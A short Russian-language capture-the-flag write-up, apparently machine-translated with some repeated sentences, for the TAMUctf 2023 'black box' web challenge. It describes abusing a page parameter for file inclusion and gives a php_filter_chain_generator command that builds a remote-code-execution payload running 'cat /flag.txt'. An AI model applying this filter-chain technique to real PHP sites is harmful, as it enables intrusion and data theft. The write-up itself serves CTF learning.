TAMUctf 2023 - запись черного ящика
May 01 2023
Этот вызов создан г-ном Блейдом. Мы видим, что он загружает страницу входа с параметром страницы.
Этот вызов создан мистером Блейдом.

Мы видим, что он загружает страницу входа с параметром страницы .
Пронумеруем файлы. Сначала я попробовал admin и использовал кодировщики base64.

Когда мы расшифруем это, мы сможем получить путь к flag.txt.
<center>
<h1><?php include('/flag.txt'); ?></h1>
</center>
Я используюhttps://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py
чтобы получить РВП.
python3 filter_chain.py — chain ‘<?php system(“cat /flag.txt”);?>’ | grep ‘^php*’ | xclip -selection clipboard

Спасибо за прочтение.
Удачного взлома!